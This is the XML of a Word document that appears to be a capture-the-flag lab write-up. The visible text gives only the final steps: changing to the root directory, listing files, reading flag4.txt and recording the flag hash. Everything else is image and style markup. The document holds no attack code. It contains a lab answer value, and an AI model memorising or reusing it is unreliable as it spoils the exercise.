    <w:p w14:paraId="3194B4BF" w14:textId="5A81E67A" w:rsidR="00225ECD" w:rsidRDefault="00225ECD">
      <w:r w:rsidRPr="00225ECD">
        <w:t>retrieve the last flag, type: cat C://flag4.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7458E72D" w14:textId="74688133" w:rsidR="00225ECD" w:rsidRDefault="005E77D2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68316AF3" wp14:editId="55FFEE47">
            <wp:extent cx="5753396" cy="1314518"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1616249845"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49845" name="Picture 27" descr="A screen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53396" cy="1314518"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F4CA41" w14:textId="77777777" w:rsidR="005E77D2" w:rsidRDefault="005E77D2"/>
    <w:p w14:paraId="39448D16" w14:textId="67708F7F" w:rsidR="005E77D2" w:rsidRDefault="005E77D2">
      <w:r>
        <w:t>Cd /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709FB699" w14:textId="7A494BC2" w:rsidR="005E77D2" w:rsidRDefault="005E77D2">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B27253B" w14:textId="4BBEA0B3" w:rsidR="005E77D2" w:rsidRDefault="005E77D2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B27DCD3" wp14:editId="077D4713">
            <wp:extent cx="5816899" cy="1327218"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="18942815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81543" name="Picture 1894281543"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5816899" cy="1327218"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C6ADF9" w14:textId="7FCEF9B6" w:rsidR="005E77D2" w:rsidRDefault="005E77D2">
      <w:r>
        <w:t>Cat flag4.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6315D7B5" w14:textId="17340BB2" w:rsidR="005E77D2" w:rsidRDefault="005E77D2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42B17279" wp14:editId="6ED0146C">
            <wp:extent cx="3518081" cy="508026"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="1762806506" name="Picture 29"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06506" name="Picture 29" descr="A black and white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518081" cy="508026"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="533D5F3C" w14:textId="3A33AD4B" w:rsidR="005E77D2" w:rsidRDefault="005E77D2">
      <w:r>
        <w:t>Flag4=</w:t>
      </w:r>
      <w:r w:rsidRPr="005E77D2">
        <w:t xml:space="preserve"> 2057abcb00fd47dbaba9fb7783c889fc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBADE9A" w14:textId="6AB0CFEE" w:rsidR="000A4AEC" w:rsidRDefault="000A4AEC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C25CC22" wp14:editId="3E78D28E">
            <wp:extent cx="3918151" cy="952549"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="285704794" name="Picture 3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04794" name="Picture 30" descr="A screen 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918151" cy="952549"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9B9C71" w14:textId="77777777" w:rsidR="00F0057F" w:rsidRDefault="00F0057F"/>
    <w:p w14:paraId="052761BE" w14:textId="10D4FFD1" w:rsidR="00F0057F" w:rsidRDefault="00F0057F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5666ACE5" wp14:editId="2D9F4096">
            <wp:extent cx="4349974" cy="5054860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1389182695" name="Picture 3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82695" name="Picture 31" descr="A screenshot of a cha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349974" cy="5054860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F00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A1DC6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3A4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52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1C"/>
    <w:rsid w:val="000303A3"/>
    <w:rsid w:val="000A4AEC"/>
    <w:rsid w:val="000F69E3"/>
    <w:rsid w:val="00225ECD"/>
    <w:rsid w:val="002B4AEB"/>
    <w:rsid w:val="004402FC"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="005E77D2"/>
    <w:rsid w:val="007943D0"/>
    <w:rsid w:val="007C58D5"/>
    <w:rsid w:val="00847E9E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="0087613A"/>
    <w:rsid w:val="008B6C1C"/>
    <w:rsid w:val="009244C4"/>
    <w:rsid w:val="00936EB3"/>
    <w:rsid w:val="009775F5"/>
    <w:rsid w:val="00A4693D"/>
    <w:rsid w:val="00A54A0D"/>
    <w:rsid w:val="00A67564"/>
    <w:rsid w:val="00BB627A"/>
    <w:rsid w:val="00D4131F"/>
    <w:rsid w:val="00E42634"/>
    <w:rsid w:val="00F00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180F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D9367316-3E15-42A6-B016-B136C4AB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C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C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C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C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C1C"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="008B6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C1C"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="008B6C1C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="008B6C1C"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="008B6C1C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="008B6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C1C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="008B6C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21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.tmp"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.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29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.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8.tmp"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><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36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><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7.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tmp"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.tmp"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.tmp"/><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491</Words>
  <Characters>2887</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>131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25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-05T10:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-05T13:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>